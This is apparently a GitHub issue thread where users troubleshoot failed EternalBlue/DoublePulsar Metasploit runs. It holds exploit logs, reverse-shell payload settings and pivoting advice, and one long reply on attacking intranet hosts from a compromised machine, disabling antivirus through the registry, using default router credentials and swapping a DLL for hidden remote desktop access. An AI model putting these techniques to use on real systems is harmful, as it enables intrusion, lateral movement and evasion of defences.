Error getting output back from Core; aborting

[CoolBreezeGit]

I access the remote intranet machine via post/windows/manage/autoroute。

192.168.244.0 255.255.255.0 Session 7

Then I want to attack a remote host with eternalblue_doublepulsar , but failed.

[] 192.168.244.134:445 - Generating Doublepulsar XML data [] 192.168.244.134:445 - Generating payload DLL for Doublepulsar [] 192.168.244.134:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.244.134:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 192.168.244.134:445 - Are you sure it's vulnerable?

But as a matter of fact, 192.168.244.134 is Vulnerable. Should my machine have to be in the intranet 192.168.244.0/24,too? Asking for help, thank you

[6a61756d]

Same issue. But I've seen a lot of demos in YouTube doing it over their VirtualMachines. I've added a screenshot of my auxiliary/scanner/smb/smb_ms17_010 result and the actual error itself together with the settings I used. I also did an nmap scan and it did show that port 445 is open. Additionally, I could also ping the target and I'm sure that the VM target is a 32-bit machine. Newbie here. What could be the problem?

[CoolBreezeGit]

Well, things are different for us. I mean, my machine is not in this intranet, just attacked by the puppet machine. In addition, I successfully attacked the virtual machine via eternalblue_doublepulsar. Regarding your case, do you confirm that your goal is Windows XP?

[Ug0Security]

Sup. Correct me if i'm wrong. I think the problem is about routing. It seems that you can't use eternalblue "remotely" through a meterpreter session. The problem is that Wine isn't able to reach the session so basicaly you execute Eternalblue on Your Local IP instead of "Their" Any help on this ?

[Ug0Security]

As a workaround you can :

1- Set XML parameter so they fit your target (with metasploit or not) 2- upload deps file to the compromised host 3-Execute EternalBlue/Doublepulsar from the compromised host (this way it can reach the local ip adress) 4- Profit ?

[6a61756d]

@CoolBreezeGit As you can see in the screenshot I provided, the target is a Windows XP x86 VirtualMachine. Its network setting is properly configured (bridged through my host machine). I am trying to look at the source code now. How did you fix the problem?

[NitroMS]

Anyone figure it out?

[fquiroga]

Hi, I have the same issue, the exploit is running ok in my LAN, but trough a VPN the errors are:

[] Started reverse TCP handler on 192.168.15.0:4444 [] 192.168.0.96:445 - Generating Eternalblue XML data [] 192.168.0.96:445 - Generating Doublepulsar XML data [] 192.168.0.96:445 - Generating payload DLL for Doublepulsar [] 192.168.0.96:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.0.96:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 192.168.0.96:445 - Are you sure it's vulnerable? [] 192.168.0.96:445 - Launching Doublepulsar... [-] 192.168.0.96:445 - Oops, something was wrong! [] Exploit completed, but no session was created

I can ping, telnet to 445 port successfuly, but i think this is by some tipe of routing problems with wine. Regards

[6a61756d]

@fquiroga I haven't resolved the issue yet. How about you?

[fquiroga]

@6a61756d Nope i didn't resolve the issue, using auxiliary/scanner/smb/smb_ms17_010 seems vulnerable host, but can't exploit them through a VPN, even if configure the lhost to my VPN interface and i'm sure that no firewall is running in the network.

[Adawang007]

I have the same problem，Can it be the problem of wine?

[Adawang007]

It seems that the operating system has been patched...

[peterpt]

If you are exploiting a public ip then the only way for the vulnerable host to communicate with your meterpreter session is if you configure your gateway router with a port forward directly to your lan ip . If you can connect to internet directly from your linux machine without routing thru a gateway device like a router then you will be able to connect successfully the target .

One of the most causes also for this problem is if the vulnerable host have some software firewall looking at the tcp connections . What happens is that Eternal blue is able to connect to target , but the meterpreter session is unable to connect to you because some firewall software is blocking it .

[Mys7erio]

Yep ! My ISP is blocking all the incoming connections.

[peterpt]

For what i could see in the code , this ruby script creates a xml config file with all the config options and then execute eternalblue executable from equation group . Maybe the best solution to exploit an intranet machine is to setup manually a xml config file , build a dll output with metasploit with the payload , where the payload is set to connect to your ip and not the hacked machine where you are connected . Then using meterpreter , upload the 3 files to the 1st remote target and execute eternalblue.exe from there . This way , the eternalblue.exe will target the intranet machine , and then the intranet machine will open a reverse meterpreter connection to your ip .

However , if the hacked machine have some firewall software running , then it will popup a message blocking the connection from the hacked machine to the intranet machine . To avoid this , maybe killing that firewall (antivirus) service could be the best option for success . And most software firewalls have counter measures to not be shut down , this means that the firewall software will restart again or it will not be killed . When this scenario happens , the best way to get around it is to look into registry settings of that machine and look for startup services and set the firewall services off on startup and then force a restart of the hacked machine .

After all , original fuzzbunch package from shadow brokers was all about that , and this is why they were able to get that package , because NSA to be able to get into the intranet of a specific network structure they had to install their fuzzbunch package i the remote hacked machine and then run it from there to the rest of the network .

However , i have no idea if a 64bit machine will run eternalblue.exe correctly , because fuzzbunch original package only works fine in 32bit machines .

Other option to access a specific intranet machine would be hacking the router (firewall) thru an ssh session via the hacked machine and set a port forward rule to that intranet machine to other port .

intranet machine - router port 445 -> 567

and config double pulsar to exploit port 567 on that 1st remote ip . But it not be easy , unless that remote router(firewall) still uses the default brad username & password .

For Windows XP , the best way to hack their intranet saffely without popping up firewalls on current logged user is to replace the terminal dll with an hacked one that allow a remote desktop connection without logging off the current user . http://www.freetutorialssubmit.com/concurrent-remote-desktop-without-log-off-other-users/801

By replacing the dll and starting remote desktop server on the first hacked machine via meterpreter , you will be able to connect to that 1st hacked machine a do the rest by remote desktop on a different user session . This way it will not popup connection warnings by the software firewall to the other user . I have no idea if this (remote desktop hacking) exists to new windows versions , but if anyone reading this knows , then drop here a link for others to test .

Note : only now i notice that Ug0Security already gave this exploiting option for intranet .

[ppdmartell]

@Ug0Security Maybe you are right, what if the problem is the machine is not in your subnet? However, what could be a good workaround for this? Maybe changing some options in the wine setup. I'm not an expert, but if the problem is that simple this should take a few minutes for one (expert).

[ghost]

what can i do [] Started reverse TCP handler on 192.168.0.114:4444 [] 192.168.0.105:445 - Generating Eternalblue XML data [] 192.168.0.105:445 - Generating Doublepulsar XML data [] 192.168.0.105:445 - Generating payload DLL for Doublepulsar [] 192.168.0.105:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.0.105:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 192.168.0.105:445 - Are you sure it's vulnerable? [] 192.168.0.105:445 - Launching Doublepulsar... [-] 192.168.0.105:445 - Oops, something was wrong! [] Exploit completed, but no session was created.

[ghost]

my options Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name Current Setting Required Description

---

DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64) RHOST 192.168.0.105 yes The target address RPORT 445 yes The SMB service port (TCP) TARGETARCHITECTURE x64 yes Target Architecture (Accepted: x86, x64) WINEPATH /root/.wine/drive_c/ yes WINE drive_c path

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.114 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port

Exploit target:

Id Name

---

5 Windows Vista (x64)

[ghost]

I try change explorer.exe to lsass.exe but it not work:(

[peterpt]

Injecting 32bit dll into 64bit machine will work , but 64bit into 32bit machines will crash the service or windows , or will pop an error to current user logged . You all must realize that Microsoft already released patches for windows including XP POS Ready for this vulnerability , sometimes if you cant exploit it could mean that windows is already patched . The exploit could be named "Eternal" , but it is only eternal until the user install the patch for that windows version , after that point is no more eternal .

[AoG22]

ANYONE SOLVED IT ?

[Ug0Security]

Stop using this.. there are way better alternative now..

https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/smb

[AoG22]

thank you

On Wed, Aug 12, 2020 at 12:06 AM Ug0Security [email protected] wrote:

Stop using this.. there are way better alternative now..

https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/smb

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/13#issuecomment-672307056, or unsubscribe https://github.com/notifications/unsubscribe-auth/AOIIC6J5QRKEYYQC6MQFRDDSAG6HXANCNFSM4DLDR7AQ .

[AoG22]

when i use ms17_010_psexec i received that victim is not vulnerable

On Wed, Aug 12, 2020 at 12:08 AM Ahmed Osama [email protected] wrote:

thank you

On Wed, Aug 12, 2020 at 12:06 AM Ug0Security [email protected] wrote:

Stop using this.. there are way better alternative now..

https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/smb

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/13#issuecomment-672307056, or unsubscribe https://github.com/notifications/unsubscribe-auth/AOIIC6J5QRKEYYQC6MQFRDDSAG6HXANCNFSM4DLDR7AQ .

[lilplucky]

hey,someone help me sort out what files or stuff are missing here

[ZhiboWong]

Stop using this.. there are way better alternative now..

https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/smb

Which one is the best for Eternalblue？